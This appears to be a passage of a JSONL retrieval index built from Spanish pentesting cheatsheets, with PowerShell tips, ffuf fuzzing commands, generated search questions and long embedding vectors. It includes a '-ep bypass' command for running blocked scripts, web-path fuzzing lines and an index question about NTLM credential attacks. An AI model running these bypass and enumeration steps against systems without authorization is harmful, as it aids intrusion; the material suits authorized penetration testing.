-0.09763, -0.08586, -0.05151, 0.02209, 0.05164, -0.00281, 0.0409, -0.0348, 0.021, 0.04072, -0.00629, 0.01809, 0.08289, 0.07817, -0.11818, -0.05756, 0.1624, 0.03634, 0.05903, -0.01137, 0.00428, 0.05705, 0.02686, -0.11051, -0.05372, 0.13312, -0.00619, 0.00977, 0.01023, 0.03333, -0.1583, -0.02995, -0.06909, -0.06582, -0.07497, 0.01835, 0.1101, -0.07343, -0.01257, -0.04266, 0.09068, 0.07351, 0.0867, -0.00992, -0.04565, 0.05832, -0.04512, 0.0074, 0.12646, 0.04134, 0.09629, -0.0362, -0.06499, -0.00355, 0.04479, -0.04747, 0.02794, 0.01145, 0.03921, 0.01506, -0.00283, -0.0598, -0.02157, 0.00047, 0.10733, -0.0106, 0.03539, 0.06191, -0.06757, -0.04472, -0.06117, 0.03496, -0.04963, -0.08745, -0.00429, -0.04564, 0.10003, 0.08091, -0.0801, -0.00329, 0.0471, 0.01406, -0.01334, -0.08371, 0.04375, 0.01188, -0.09544, 0.0222, -0.05779, 0.00574, 0.03916, -0.02119, 0.01542, 0.01394, -0.03987, -0.07204, 0.09551, 0.04147, -0.01701, 0.00699, -0.03826, -0.02542, -0.00118, -0.011, 0.08022, -0.01016, -0.11189, 0.0091, 0.00781, 0.03483, 0.02938, -0.00936, -0.05107, -0.0281, 0.04611, -0.00489, -0.00821, 0.01882, -0.02004, -0.01212, 0.06222, 0.01631, 0.03304, 0.01786, -0.0062, 0.06283, -0.03807, -0.05309, -0.05084, 0.05687, 0.0658, -0.08627, -0.0378, 0.0031, -0.01025, 0.04093, 7e-05, 0.00169, -0.01076, -0.01192, -0.01135, 0.06071, 0.06708, -0.03801, -0.00263, 0.00337, -0.02701, 0.02137, -0.01566, 0.00395, 0.01422, -0.01521, -0.03177, 0.01118, 0.01392, 0.01253, -0.09637, -0.01976, -0.08148, -0.03987, 0.00542, 0.01375, -0.00838, -0.02803, 0.04334, -0.01125, -0.06721, -0.05644, -0.07047]} +{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacΓ­a). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) Β· `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash Β· Port scanner PowerShell Β· OSCP MOC", "indexar": "como puedo ejecutar un script de powershell ignorando la verificaciΓ³n de firma?", "v": [0.11176, 0.08071, -0.17663, -0.0368, 0.14243, -0.07058, 0.0297, -0.04983, -0.03175, -0.1651, -0.01893, -0.01642, 0.05196, -0.16098, 0.00881, 0.07232, 0.03627, -0.09695, -0.01494, 0.02197, 0.08926, -0.02097, -0.00317, -0.08549, -0.07452, 0.08047, -0.16028, 0.02182, -0.06921, -0.13297, -0.04972, -0.02282, 0.11758, -0.0251, -0.02904, 0.08901, -0.05671, 0.0627, 0.04957, 0.2176, -0.04871, 0.14075, 0.01342, 0.0733, 0.02589, -0.02274, 0.04107, -0.07349, 0.05693, 0.01886, -0.07488, -0.01918, -0.21714, 0.00674, 0.00688, 0.07434, 0.10277, -0.08792, 0.04904, 0.03591, -0.13106, -0.011, 0.00391, 0.05527, 0.04342, 0.14201, 0.03598, -0.10558, 0.00357, 0.02668, -0.02664, -0.04205, -0.10036, 0.04672, -0.058, -0.11738, 0.00939, 0.02564, -0.00612, 0.11366, -0.00715, -0.05783, -0.08513, 0.02725, -0.03709, -0.06794, -0.12778, -0.05002, -0.06473, -0.05422, 0.02405, 0.02585, -0.03629, 0.05852, -0.00082, 0.0268, 0.06913, -0.05032, -0.00333, 0.03497, 0.00621, -0.05547, -0.05705, 0.05677, 0.04484, 0.07757, -0.07529, -0.02149, 0.04955, -0.0265, -0.02564, -0.0121, -0.0472, -0.06292, 0.00339, -0.03188, -0.07325, -0.14214, 0.06934, -0.10908, -0.05161, -0.03651, -0.03108, 0.00935, -0.02471, -0.05404, -0.01646, 0.0945, 0.02803, 0.01548, -0.01471, 0.01073, -0.06731, -0.06205, -0.01777, 0.03308, 0.02405, -0.00601, 0.00651, -0.04169, 0.1039, 0.10299, -0.05046, 0.07422, 0.10657, 0.02101, -0.08208, -0.05537, -0.09438, 0.02136, -0.00786, -0.00649, -0.05061, 0.10786, -0.02133, -0.08992, 0.09426, 0.00384, 0.06585, 0.0328, -0.05946, -0.00598, -0.12706, 0.06241, 0.04394, 0.02186, -0.03574, -0.00372, 0.00202, 0.00282, 0.01208, 0.02638, -0.01163, -0.06955, 0.08285, -0.01404, -0.03567, -0.00256, -0.0046, -0.02468, 0.03776, 0.02304, -0.0229, 0.03278, 0.00893, 0.06716, 0.01337, -0.0456, 0.01026, 0.05785, 0.03494, 0.09905, 0.0207, -0.07326, 0.00506, 0.02688, 0.04876, -0.03993, 0.00537, -0.06259, -0.03426, -0.00194, -0.02355, -0.0368, 0.03567, 0.02399, -0.05247, 0.0561, -0.06544, 0.02507, 0.05635, -0.02426, 0.02394, -0.01769, -0.04412, -0.04783, 0.05005, -0.00855, 0.02479, -0.00268, -0.0313, -0.0182, 0.13506, 0.03646, -0.00046, -0.04699, 0.02108, 0.03504, -0.02879, 0.03776, -0.02722, 0.07029, -0.03116, -0.07903, 0.03147, -0.00155, 0.0341, -0.0491, -0.02291, -0.01546, 0.05024, 0.00745, -0.07152, -0.08613, -0.10434, -0.00908, -0.08389, -0.00938, 0.0098, -0.05728, -0.04524, 0.01051, 0.02978, -0.04984, 0.03247, -0.04612]} +{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacΓ­a). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) Β· `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash Β· Port scanner PowerShell Β· OSCP MOC", "indexar": "con que opciΓ³n del cmdlet ErrorAction prefiero no mostrar mensajes?", "v": [0.15955, 0.21127, -0.00879, -0.13769, 0.02132, -0.08156, -0.03883, 0.01324, 0.02434, -0.1439, -0.05899, -0.04235, 0.08187, -0.07385, 0.00826, 0.06319, 0.07792, 0.05838, 0.06753, -0.00183, 0.07682, 0.01374, 0.01443, 0.00625, -0.02148, 0.08565, -0.08525, 0.03051, -0.03105, -0.06207, -0.00594, -0.08983, 0.12663, 0.02444, 0.04456, 0.10043, 0.01147, 0.0351, -0.06086, 0.1515, 0.04897, 0.0937, -0.06089, 0.03595, 0.0255, -0.18703, -0.06345, 0.10573, -0.00703, -0.09332, 0.02556, -0.09669, -0.12767, 0.03417, -0.00889, 0.04594, 0.20817, -0.00993, 0.05058, -0.06277, -0.0378, -0.04746, 0.00382, 0.0567, -0.00569, 0.05021, -0.00583, -0.06479, -0.09502, 0.10792, -0.10208, 0.01066, -0.05009, 0.03848, 0.06707, 0.08515, -0.11783, 0.08623, 0.0168, -0.00247, -0.03549, -0.08885, -0.02058, -0.01672, -0.03039, -0.16523, -0.04991, -0.00059, -0.06279, -0.14594, 0.08771, -0.0066, 0.00603, 0.05515, 0.04521, -0.12792, -0.00077, 0.03503, 0.0168, 0.05845, 0.13087, -0.0071, -0.0124, 0.12083, 0.01272, -0.04902, 0.0585, -0.03581, 0.03883, 0.00666, 0.01992, -0.10055, 0.13896, -0.00514, -0.03807, -0.08034, -0.05126, -0.04047, -0.05071, -0.00742, -0.09577, -0.0363, 0.06185, 0.0163, -0.04086, 0.02619, -0.04738, 0.00116, -0.0075, 0.07083, -0.10767, -0.03392, 0.01722, -0.06281, -0.0874, 0.07839, 0.05317, 0.02108, -0.02736, 0.00226, 0.0776, 0.10106, -0.03852, -0.02305, 0.04509, 0.01628, -0.04768, -0.09878, -0.02787, 0.02136, 0.09872, 0.01882, 0.02814, 0.01407, -0.00664, -0.01777, 0.01976, -0.03165, 0.04807, 0.0473, -0.03808, -0.0714, -0.0185, 0.07807, 0.04154, -0.01967, -0.02746, 0.0451, -0.00896, -0.0192, -0.0205, 0.07829, 0.01141, -0.0844, -0.02314, -0.05313, 0.07943, -0.02036, -0.01878, -0.0041, -0.01694, 0.03837, -0.04318, 0.0463, -0.00335, -0.05563, 0.00771, -0.03726, -0.00753, 0.02735, -0.02806, 0.08716, -0.01755, 0.04073, -0.0393, 0.00476, -0.02858, -0.03455, 0.01146, 0.02458, -0.0361, 0.05139, -0.00359, -0.0518, 0.02086, -0.0002, -0.088, -0.01519, -0.0196, 0.05148, 0.06655, -0.11378, 0.11989, -0.02435, -0.03997, 0.00799, 0.08087, 0.01282, 0.00361, 0.00178, 0.05723, 0.02704, 0.01981, -0.04165, 0.01147, 0.07042, 0.01974, 0.03447, 0.04835, 0.0708, 0.00407, 0.04376, -0.06588, -0.00034, 0.09204, -0.01169, 0.04051, -0.03946, -0.05921, -0.05967, 0.07657, 0.07159, 0.0159, -0.07004, 0.02846, -0.03389, -0.06339, 0.061, -0.03632, -0.00061, -0.00491, 0.02294, 0.00187, -0.0578, 0.01062, -0.12804]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "indexar": "que programa sirve para hacer un scan de puertos en linux sin usar man pages?", "v": [0.06299, -0.03245, -0.17666, -0.18241, 0.00434, -0.24549, -0.07036, -0.15272, -0.06412, -0.06123, -0.0971, -0.03091, 0.03038, -0.11736, -0.09746, -0.06857, -0.02424, -0.05616, 0.08247, 0.00771, -0.06475, 0.03637, -0.06955, -0.07739, 0.00583, 0.07624, 0.05794, -0.12391, -0.0757, 0.07326, -0.09155, 0.08113, 0.10971, -0.04539, -0.06685, -0.11742, 0.07681, -0.01531, 0.13608, 0.20301, 0.07647, 0.03774, -0.09297, -0.02126, -0.00384, -0.0713, 0.03526, 0.01052, 0.07264, 0.00783, -0.03847, -0.01084, -0.07418, 0.03908, 0.00113, -0.07974, 0.03334, -0.11883, 0.01031, -0.08867, -0.07022, 0.04077, -0.00209, -0.06602, 0.01584, -0.01923, -0.02972, 0.06976, -0.12017, 0.00865, -0.07803, 0.1223, 0.05756, 0.0143, -0.0171, -0.0957, -0.07762, -0.00056, 0.10609, 0.01001, 0.0369, -0.02308, -0.00454, -0.02503, -0.13104, -0.08137, -0.04237, 0.07391, 0.01583, -0.03259, 0.00855, 0.00119, -0.00814, 0.09341, 0.08488, 0.0067, 0.05842, 0.09722, 0.05703, 0.03059, 0.08777, -0.06404, -0.0751, 0.07337, -0.03763, -0.00099, 0.05166, -0.05031, -0.03068, 0.03592, 0.11599, 0.00587, -0.05621, -0.06761, -0.15877, -0.00784, -0.01586, -0.05803, -0.02989, -0.03456, -0.05226, -0.06208, -0.05334, 0.01478, 0.05684, 0.01724, 0.04651, 0.14405, -0.02958, 0.01891, 0.05665, -0.07818, -0.07146, -0.00968, -0.10749, -0.09392, 0.02023, -0.10947, -0.03238, -0.02681, -0.00412, 0.11252, -0.04944, 0.05226, 0.03685, -0.00474, 0.01809, -0.01729, -0.05626, -0.02662, 0.03706, 0.01982, -0.03619, 0.0477, -0.06139, -0.08152, 0.10058, -0.03563, -0.0524, 0.02316, -0.03083, -0.011, 0.00159, 0.02184, 0.08026, -0.01145, -0.05467, 0.03834, 0.05607, 0.06587, 0.00978, 0.16791, -0.0095, -0.13004, 0.03183, -0.03757, 0.02657, -0.02146, -0.025, 0.00021, -0.04648, 0.04057, 0.04256, -0.03375, -0.01213, -0.03467, -0.01183, -0.03207, -0.00599, 0.02917, 0.02881, 0.04113, -0.05663, 0.0139, -0.01496, 0.04143, -0.01484, 0.03644, 0.05139, -0.05169, 0.00512, 0.00589, 0.02526, -0.01845, 0.07702, 0.06306, -0.06696, 0.00066, 0.03588, 0.08572, -0.01856, -0.00621, 0.02476, 0.03262, -0.07534, -0.01792, 0.02725, 0.06119, 0.06505, 0.0288, -0.01726, -0.01305, -0.04393, 0.07073, 0.02574, -0.03604, 0.04648, 0.00352, 0.03182, 0.00774, 0.01328, 0.01332, -0.03367, 0.00348, 0.0066, 0.01496, 0.0031, 0.02826, 0.0071, -0.11403, -0.04335, 0.02437, 0.00091, -0.03048, -0.0088, -0.00574, -0.0496, 0.00305, 0.00139, 0.00576, -0.05142, 0.01154, 0.04176, -0.01675, 0.0319, 0.0273]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "indexar": "cual es una herramienta que permita ejecutar comandos bΓ‘sicos de pentesting desde la terminal?", "v": [0.07629, 0.08161, -0.08817, -0.16999, 0.09411, -0.09082, 0.05292, -0.03403, -0.09023, -0.00742, -0.18199, 0.12359, 0.04518, -0.06242, 0.04891, 0.12935, 0.02359, -0.09288, 0.09738, -0.08618, -0.01027, -0.03805, -0.0401, 0.0377, -0.08055, 0.0966, 0.10679, -0.02544, -0.20287, -0.0678, -0.00723, -0.03585, 0.10634, -0.08976, -0.03945, -0.04412, -0.0747, 0.01981, -0.03807, 0.17897, -0.06755, 0.00311, -0.13417, 0.10882, 0.02633, -0.05888, 0.04415, 0.09099, 0.12923, -0.06666, 0.01688, -0.07669, -0.11487, -0.00287, -0.02419, -0.07301, 0.24831, -0.13712, 0.03874, -0.0857, -0.05531, -0.01923, 0.03221, 0.0253, 0.02514, -0.01576, 0.01098, -0.13461, -0.01377, 0.14135, -0.04367, 0.09884, -0.00706, 0.1018, 0.04979, -0.05137, -0.05631, 0.05652, 0.15174, 0.03774, 0.00478, -0.00336, -0.10288, 0.03615, -0.04369, -0.15488, -0.08489, 0.00369, -0.0022, 0.01161, 0.01358, 0.00994, -0.01864, 0.05411, 0.0132, 0.03129, -0.02965, 0.00929, 0.02574, -0.01028, 0.09679, -0.03116, -0.09974, 0.0938, 0.04035, -0.02738, -0.00253, -0.01759, -0.03379, -0.03819, 0.05279, -0.01861, 0.09314, -0.02668, -0.071, -0.05409, -0.01607, -0.07859, -0.0207, -0.11755, -0.02887, 0.04645, -0.04175, 0.03162, 0.05309, -0.01565, -0.02905, 0.07034, 0.08151, -0.01566, 0.039, -0.05846, 0.09031, -0.03803, -0.07005, 0.05594, 0.07434, -0.1443, -0.09851, -0.09421, 0.02963, 0.06959, -0.01133, -0.0412, 0.08081, 0.01955, -0.01469, -0.04676, -0.05406, -0.01399, 0.05381, -0.01757, -0.09018, 0.02776, -0.04186, -0.03184, -0.01541, 0.02431, -0.10169, 0.03836, -0.0414, -0.07222, -0.02455, -0.01458, 0.04163, -0.04694, -0.04479, 0.02916, 0.02934, 0.01286, 0.06375, -0.01417, 0.01173, 0.02157, 0.03561, -0.05097, -0.0784, -0.00778, 0.00609, -0.00866, -0.00147, 0.01115, -0.04847, -0.01958, 0.01352, -0.09786, 0.00719, -0.01617, 0.02099, 0.02976, 0.00654, 0.06923, -0.02021, -0.06772, 0.04291, -0.00352, 0.02389, -0.06376, -0.03894, -0.02899, -0.04717, 0.04868, 0.02548, -0.07081, 0.07362, 0.05007, -0.06051, -0.00536, -0.02728, 0.05062, 0.01203, 0.01198, 0.00737, 0.00013, 0.00158, -0.03732, -0.0237, 0.03182, -0.01267, 0.01451, 0.01165, 0.00927, 0.0659, -0.0187, -0.00109, -0.01251, -0.00838, 0.01134, 0.0247, -0.03188, 0.0284, -0.01335, -0.03942, -0.04176, 0.02481, -0.02641, 0.02388, 0.00106, -0.01497, -0.02434, 0.02992, 0.06625, 0.00734, -0.06895, -0.02733, -0.01919, -0.03155, -0.02444, -0.03403, -0.03453, 0.00634, 0.00574, 0.05978, -0.05296, -0.01844, -0.0364]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "indexar": "con que puedo montar un ataque con credenciales NTLM sin documentaciΓ³n detallada?", "v": [-0.10796, 0.05373, -0.12876, -0.07186, -0.02699, 0.00171, -0.02923, 0.20206, -0.17471, 0.08142, -0.02459, 0.01342, 0.07891, -0.09109, -0.0118, 0.10447, -0.04468, -0.15044, 0.08836, -0.03955, -0.05679, -0.13965, -0.01762, -0.09969, -0.03495, 0.04754, -0.04344, -0.01886, 0.01465, -0.0471, -0.02814, 0.03753, -0.07715, 0.09709, 0.11829, -0.01251, -0.05822, -0.02636, -0.03515, 0.11312, -0.01364, 0.00342, -0.04008, 0.09844, 0.10302, -0.02448, -0.05952, 0.02325, 0.02539, -0.18318, 0.07583, 0.08934, -0.11647, -0.14156, -0.0989, -0.0796, 0.16598, -0.05798, 0.14571, -0.03027, -0.00684, 0.09026, -0.0103, -0.05102, 0.02572, -0.00229, 0.03336, -0.0131, -0.05539, -0.06587, -0.12148, -0.05284, 0.05325, -0.08857, -0.09051, -0.05115, -0.02043, 0.08335, 0.02408, 0.11747, 0.11039, -0.05124, -0.09884, -0.02224, -0.08928, -0.02414, -0.00062, -0.05409, 0.00077, -0.01893, 0.07635, 0.01369, -0.01418, -0.03246, -0.00438, -0.08305, 0.01639, 0.01049, 0.01018, -0.007, -0.06741, -0.02961, -0.04068, 0.12884, -0.02154, -0.00481, 0.03362, -0.04085, -0.02601, -0.04942, 0.04634, 0.02105, -0.14943, -0.00755, -0.03565, -0.06377, -0.09281, 0.01983, -0.02349, -0.04766, 0.00104, -0.01215, 0.04667, 0.06242, -0.04044, -0.01505, -0.02911, 0.08189, -0.09873, 0.01884, -0.02706, -0.032, -0.01598, 0.02239, 0.06368, -0.02764, -0.12604, -0.1126, -0.05332, 0.04306, 0.04479, -0.02568, 0.00215, 0.00322, -0.03139, 0.02701, -0.02883, -0.09967, -0.01919, -0.05142, 0.09676, 0.11752, 0.06285, 0.07743, -0.05014, -0.04003, 0.14732, 0.02547, -0.06052, 0.11678, 0.0654, 0.07501, -0.05588, 0.07037, -0.00701, -0.00014, -0.03855, -0.06134, 0.0501, -0.00399, -0.01045, 0.01339, 0.01241, -0.02967, 0.06588, -0.08275, 0.00624, -0.05411, -0.00927, -0.0405, 0.02038, 0.00157, -0.01752, 0.01057, -0.01926, 0.00445, 0.03519, -0.001, -0.01358, -0.00355, -0.03083, 0.02348, 0.02289, 0.06273, 0.0337, -0.07448, -0.01917, -0.01667, -0.01972, 0.02432, -0.04173, -0.01857, -0.04086, -0.02512, 0.0844, 0.1093, -0.05744, 0.057, -0.01803, 0.06512, 0.04174, -0.05301, 0.07269, -0.11195, -0.11653, 0.01862, 0.02463, -0.03229, -0.04901, 0.02555, 0.03808, 0.03883, 0.04942, 0.04589, 0.0682, -0.11175, 0.01849, -0.0144, 0.0242, 0.04011, -0.00329, -0.0084, 0.0442, -0.03446, -0.01828, 0.0169, 0.03796, 0.00122, -0.0875, -0.00962, 0.0154, 0.034, -0.00396, -0.04734, -0.02312, -0.03314, -0.04677, 0.01683, 0.00292, -0.0335, 0.02097, 0.00542, 0.01897, -0.04165, 0.01833, -0.036]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# ffuf\nffuf -u http://IP/FUZZ -w WL -mc 200,301,302,401,403 -e .php,.txt,.html\nffuf -u http://IP/ -w WL -H \"Host: FUZZ.dominio.com\" -fs 4242 # vhost\nffuf -u \"http://IP/page?FUZZ=1\" -w WL -fw 42 # parametros\nffuf -u http://IP/api/FUZZ -w WL -mc all -fc 404 -recursion", "indexar": "quΓ© programa sirve para buscar rutas ocultas en una web como lo hace ese comando?", "v": [0.05676, -0.00076, -0.20602, -0.05754, 0.03685, -0.11013, 0.05652, -0.03805, -0.0516, -0.09285, -0.12699, -0.11355, 0.04538, -0.07107, 0.06517, 0.02491, 0.15595, 0.04888, 0.04602, -0.03094, -0.00721, -0.05582, 0.07157, -0.03351, -0.06384, -0.02765, 0.1439, -0.02507, -0.09758, -0.05561, 0.00333, 0.12764, 0.01222, -0.08234, -0.06096, 0.05328, 0.01156, -0.02973, -0.04979, 0.08135, -0.01471, 0.02648, -0.18588, 0.08102, 0.01381, -0.07634, -0.00437, -0.0594, 0.07866, -0.00902, -0.05468, -0.07355, -0.08882, -0.00217, 0.11131, -0.07198, 0.06946, -0.10963, -0.00356, 0.04114, -0.05681, -0.07723, 0.09825, 0.04618, 0.01096, -0.03704, 0.00782, -0.07464, -0.04568, -0.02649, -0.04406, 0.07376, 0.01752, 0.0606, 0.05217, 0.02259, -0.04059, 0.02367, 0.13652, -0.02386, -0.00393, 0.07744, -0.09508, 0.14715, -0.10349, -0.03745, 0.02361, -0.00905, -0.07673, -0.05037, 0.01038, 0.07628, -0.04441, 0.09362, 0.03675, -0.02741, 0.13798, 0.05435, 0.07588, 0.03961, 0.01705, -0.11156, -0.18561, 0.12866, -0.01831, 0.14367, 0.07822, -0.05374, -0.08032, 0.12411, 0.05096, -0.07076, -0.01536, -0.06405, -0.00242, -0.00914, -0.02765, -0.08261, -0.00141, -0.1016, -0.16706, 0.08568, -0.08351, 0.09078, 0.04652, -0.01413, -0.05389, 0.0821, 0.08454, 0.04983, -0.05876, -0.05535, -0.02831, -0.06247, -0.06319, 0.01536, 0.04424, -0.00138, -0.0109, -0.05197, 0.06181, 0.05417, -0.04974, -0.02838, 0.05913, -0.00495, 0.054, -0.06978, -0.02883, 0.00549, -0.03459, 0.06617, -0.00308, 0.07562, 0.0186, 0.02761, -0.02123, -0.09143, -0.0493, 0.06499, -0.01638, 0.03299, -0.08115, -0.02234, 0.05337, -0.04876, -0.07299, -0.03148, 0.06191, 0.01317, -0.02635, 0.06608, 0.01719, -0.11679, 0.01428, -0.04462, 0.01889, -0.08194, 0.06838, 0.01138, -0.05826, 0.05241, 0.05707, 0.00366, -0.03134, -0.04833, -0.00069, -0.01141, -0.02367, -0.01895, 0.02188, -0.02226, -0.03833, 0.0032, -0.0233, -0.00215, 0.01906, 0.01638, 0.03899, -0.08531, -0.09177, 0.01765, 0.0123, -0.04216, -0.00539, 0.02919, -0.02068, 0.03997, 0.01529, 0.09423, 0.03354, -0.03442, 0.04966, -0.05153, -0.02111, -0.0514, 0.01192, 0.00321, -0.01169, 0.04776, 0.01182, -0.00347, 0.02419, 0.03599, 0.07379, 0.0333, -0.02216, 0.0112, 0.03599, 0.02374, -0.02217, -0.03035, -0.07127, 0.00677, 0.03861, -0.02198, -0.00682, 0.00173, -0.03209, -0.0514, -0.02681, 0.08134, -0.00818, -0.07635, -0.04702, -0.07297, -0.10951, 0.05101, -0.00574, -0.04103, -0.0654, 0.04965, 0.01192, -0.03977, 0.03926, -0.04714]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# ffuf\nffuf -u http://IP/FUZZ -w WL -mc 200,301,302,401,403 -e .php,.txt,.html\nffuf -u http://IP/ -w WL -H \"Host: FUZZ.dominio.com\" -fs 4242 # vhost\nffuf -u \"http://IP/page?FUZZ=1\" -w WL -fw 42 # parametros\nffuf -u http://IP/api/FUZZ -w WL -mc all -fc 404 -recursion", "indexar": "con quΓ© herramienta puedo probar diferentes extensiones de archivos en un servidor?", "v": [0.0466, 0.09536, -0.15366, -0.18632, -0.01058, -0.05517, 0.05824, -0.04025, -0.00801, -0.11112, -0.17908, 0.0076, -0.00526, -0.12947, 0.04266, 0.02919, 0.21527, -0.13847, 0.0455, 0.05457, 0.01387, -0.0221, -0.13753, -0.09063, -0.07041, -0.00684, -0.00973, 0.02503, -0.10362, 0.03045, -0.06736, 0.05215, 0.07958, -0.00085, -0.08006, -0.00642, 0.01001, 0.08213, -0.05956, 0.02716, 0.06615, -0.0212, -0.0942, 0.0272, -0.04973, -0.00744, -0.03533, -0.01277, 0.02103, 0.00522, -0.07731, -0.12571, -0.11307, -0.00638, 0.02917, -0.10422, 0.12287, -0.22482, 0.04876, -0.01247, -0.0807, 0.0746, -0.05461, -0.04961, 0.08221, -0.04579, -0.09051, -0.04158, -0.14828, 0.05529, -0.12656, 0.08814, 0.01898, -0.02049, -0.0652, 0.0801, 0.04246, -0.06064, 0.0366, 0.05074, 0.04875, 0.02745, -0.08316, 0.08244, -0.11069, -0.07132, 0.01148, -0.01434, 0.05705, -0.04425, 0.14091, 0.05983, -0.07439, 0.05646, -0.00884, -0.06169, 0.17957, -0.11345, 0.02463, -0.06055, 0.09466, 0.04362, -0.03859, 0.13821, -0.00232, 0.0662, 0.04647, -0.01957, -0.0154, -0.06082, 0.04728, 0.00711, 0.00177, 0.05849, -0.0709, -0.05259, -0.01765, -0.03413, -0.01693, 0.00104, 0.01791, 0.04482, -0.01967, 0.07535, 0.02215, -0.10745, -0.01615, 0.09946, -0.02176, -0.05045, 0.0022, -0.02015, -0.04598, 0.00661, -0.03408, 0.04255, 0.10646, -0.05391, -0.07074, -0.06268, 0.01721, 0.00241, 0.01997, -0.00985, 0.10189, -0.00562, -0.02634, -0.0591, -0.08678, -0.02646, 0.00315, -0.10263, 0.00292, 0.04422, -0.12206, 0.02178, -0.01205, -0.08204, -0.06012, 0.10204, -0.02934, 0.0304, -0.00399, 0.07193, 0.04573, -0.04312, 0.01571, 0.03322, 0.0632, 0.02169, 0.02398, 0.0112, 0.01707, -0.04561, 0.02568, -0.01186, -0.09853, -0.0238, 0.0218, -0.04331, -0.05255, 0.00943, -0.02989, -0.05136, -0.02183, -0.08416, 0.00202, -0.00503, -0.00939, 0.05983, -0.01051, 0.03896, -0.03253, -0.01257, 0.03075, -0.02787, 0.0064, -0.08246, -0.01605, -0.03735, -0.05355, -0.0326, -0.05155, -0.02596, 0.03198, 0.00445, -0.04556, 0.01692, -0.01166, 0.01757, 0.04409, -0.02401, 0.1026, -0.06799, -0.00406, -0.02512, 0.00953, 0.00258, -0.01301, -0.05728, 0.00642, 0.0194, 0.03663, -0.00505, -0.01666, 0.07755, 0.00031, 0.01169, 0.04313, -0.03009, 0.00315, 0.02865, -0.04961, -0.04283, 0.03728, -0.02973, 0.04422, -0.0067, -0.03064, -0.04196, -0.01827, 0.11153, 0.00934, -0.02331, -0.06227, -0.08079, -0.014, -0.00637, -0.04347, -0.05077, -0.02602, 0.01277, 0.06224, -0.0329, 0.01469, 0.00188]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# ffuf\nffuf -u http://IP/FUZZ -w WL -mc 200,301,302,401,403 -e .php,.txt,.html\nffuf -u http://IP/ -w WL -H \"Host: FUZZ.dominio.com\" -fs 4242 # vhost\nffuf -u \"http://IP/page?FUZZ=1\" -w WL -fw 42 # parametros\nffuf -u http://IP/api/FUZZ -w WL -mc all -fc 404 -recursion", "indexar": "existe alguna alternativa libre a ffuf para hacer escaneos de directorios?", "v": [-0.06607, -0.00843, -0.17447, 0.11509, -0.06251, -0.0433, -0.04526, -0.11435, -0.19232, 0.00926, -0.08813, -0.12223, -0.06786, -0.05932, 0.14058, -0.09825, 0.1115, -0.00856, 0.07806, -0.04704, -0.09828, 0.05516, -0.13073, -0.03713, -0.05672, -0.11311, -0.13336, 0.0039, -0.08743, -0.01307, 0.18166, 0.10362, 0.09345, -0.02641, -0.06635, 0.04698, 0.16041, -0.07559, 0.14817, 0.0449, 0.05687, -0.008, -0.12385, 0.07523, -0.081, -0.09158, -0.14879, 0.08122, 0.01493, 0.09068, 0.06865, -0.09109, 0.00453, 0.05159, 0.05354, -0.05243, 0.08328, -0.10085, -0.05792, -0.01984, -0.10561, 0.02636, 0.02812, -0.04128, 0.02492, 0.07185, -0.00099, -0.02044, -0.0332, 0.05042, -0.06099, 0.05552, 0.00614, -0.00431, -0.15498, 0.0175, -0.02436, -0.01288, -0.03881, 0.10221, 0.00298, -0.06948, -0.03496, -0.03431, -0.08756, -0.13532, 0.02946, -0.0717, -0.01883, -0.05062, 0.03262, 0.06185, -0.04001, 0.11272, 